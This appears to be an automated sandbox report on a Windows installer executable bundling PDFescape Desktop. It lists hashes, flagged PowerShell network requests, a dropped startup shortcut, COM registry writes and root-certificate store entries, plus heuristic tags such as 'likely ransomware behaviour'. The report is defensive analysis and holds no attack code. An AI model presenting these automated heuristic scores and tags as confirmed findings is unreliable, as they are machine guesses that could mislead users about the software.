eb642a90bfe0b537c3d87a2449a6b2817401ef9c273f95d7617f886a3e003f90

Resubmissions

16-03-2021 18:01

210316-trddssyj5s 10

16-03-2021 17:35

210316-s74c3lhrtn 8

Analysis

max time kernel
146s
max time network
147s
platform
windows10_x64
resource
win10v20201028
submitted
16-03-2021 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe
Size

117.6MB
MD5

015fd4bc87666d454f1517b2970dc097
SHA1

88685aaaba4297deef30ac4fe9bd065baa7c0c0d
SHA256

aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d
SHA512

ed3378510720b92fa77098c4d48763ea04e52c63bbbf074b711e16ef781281314dad6a7e0d3069bf0cd7598c1ea426b6effabd691ae0a945e79144afdd153637

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
45	212	powershell.exe
46	2456	powershell.exe
47	4052	powershell.exe
48	4540	powershell.exe
49	2588	powershell.exe
50	4032	powershell.exe
51	2428	powershell.exe
52	4564	powershell.exe
53	1996	powershell.exe
54	4520	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmpPDFescape_Desktop_Installer.exePDFescapeDesktopInstaller.exe

pid	process
3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
3208	PDFescape_Desktop_Installer.exe
644	PDFescapeDesktopInstaller.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup\a4f914844ef46f9bec48aaa58ab5e.lnk	powershell.exe

Loads dropped DLL 5 IoCs

Processes:

aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmpregsvr32.exeDllHost.exePDFescape_Desktop_Installer.exe

pid	process
3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
3300	regsvr32.exe
1012	DllHost.exe
3208	PDFescape_Desktop_Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 64 IoCs

Processes:

regsvr32.exePDFescapeDesktopInstaller.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C190A609-0000-4E00-B902-A894C0FA44E5}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58D07BB6-0000-4544-8064-3DB60EEDCF7B}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A2F518D6-0000-4360-A019-3409E7ADC462}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDEAB94F-0000-43AF-8408-C9BA782BF5D4}\LocalServer32\ = "\"C:\\ProgramData\\PDFescape Desktop\\Installation\\PDFescapeDesktopInstaller.exe\""	PDFescapeDesktopInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDEAB94F-0000-43AF-8408-C9BA782BF5D4}\Version	PDFescapeDesktopInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C11A590C-0000-4C63-8E93-279E07FA7F96}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AE8F3CCD-0000-4EDF-B08E-C25DCADD9BB4}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56A7C619-0000-4540-A77A-0C6E518E7530}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB86DDD7-CFE1-4D8B-AA2F-A732C3E66A7D}\Version\ = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{869F03A3-0000-4B45-9FB1-DF6B1387AB03}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\ = "IDownloadItemModule3_1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{57F9206E-944A-444B-B993-9D356DAEF36C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37DD0F6C-0000-46F2-8B21-3E4AB4750AFF}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\Version	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B070A15F-0000-411C-BAA4-424264999487}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A4A11886-0000-484A-BB3C-5874E6828AA1}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4A11886-0000-484A-BB3C-5874E6828AA1}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C190A609-0000-4E00-B902-A894C0FA44E5}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D55E627-0000-4791-9C81-0222A629540B}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\ = "IOptionItemInfo"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EB858205-0000-4418-8924-5D16D15EFD6C}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AE8F3CCD-0000-4EDF-B08E-C25DCADD9BB4}\ = "IOfferItemModule"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\ = "IOptionItemInfo"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C190A609-0000-4E00-B902-A894C0FA44E5}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C190A609-0000-4E00-B902-A894C0FA44E5}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58D07BB6-0000-4544-8064-3DB60EEDCF7B}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{869F03A3-0000-4B45-9FB1-DF6B1387AB03}\ = "IStatist"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{09C4B9DD-0000-459D-934A-25EC1D0B234A}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{151CD23A-0000-4238-A15C-69CA34E0BE67}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77CDE36D-0000-4223-8E25-3FFD866B17E8}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AF0E415-0000-4760-8FD7-540C0D4C0A99}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{188419DA-30AB-4A88-BC26-66A045E23263}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56A7C619-0000-4540-A77A-0C6E518E7530}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D55E627-0000-4791-9C81-0222A629540B}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDEAB94F-0000-43AF-8408-C9BA782BF5D4}\Elevation\IconReference = "@C:\\ProgramData\\PDFescape Desktop\\Installation\\PDFescapeDesktopInstaller.exe,-501"	PDFescapeDesktopInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}\ = "IDownloadItemToolbar"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7335C66-0000-4AC7-9E60-1E7BFE06708C}\1.0\0\win32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\PDFescapeDesktopInstaller.exe"	PDFescapeDesktopInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A2F518D6-0000-4360-A019-3409E7ADC462}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C11A590C-0000-4C63-8E93-279E07FA7F96}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{668B5746-0000-48B2-9F2F-FD748595F3BB}\TypeLib\ = "{C7335C66-0000-4AC7-9E60-1E7BFE06708C}"	PDFescapeDesktopInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56A7C619-0000-4540-A77A-0C6E518E7530}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB86DDD7-CFE1-4D8B-AA2F-A732C3E66A7D}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A1BB700-0000-4156-A8FA-3DD1DFBCD933}\ = "_IInstallEvents"	PDFescapeDesktopInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{57F9206E-944A-444B-B993-9D356DAEF36C}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\ProxyStubClsid32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{2F9E253B-E274-4714-AE58-E879196F7E37}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000	PDFescapeDesktopInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe

Modifies system certificate store 2 TTPs 8 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

PDFescape_Desktop_Installer.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c0000000100000004000000001000000f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	PDFescape_Desktop_Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 0f00000001000000200000003560e45b41e46b8f36537025d1d5bc02d9652a10645b0eff69e8b6a52191f335090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020001320200047003200000053000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c062000000010000002000000045140b3247eb9cc8c5b4f0d7b53091f73292089e6e5a63e2749dd3aca9198eda1400000001000000140000003a9a8507106728b6eff6bd05416e20c194da0fde1d000000010000001000000070253fbcbde32a014d38c1993098ad9903000000010000001400000047beabc922eae80e78783462a79f45c254fde68b2000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5	PDFescape_Desktop_Installer.exe
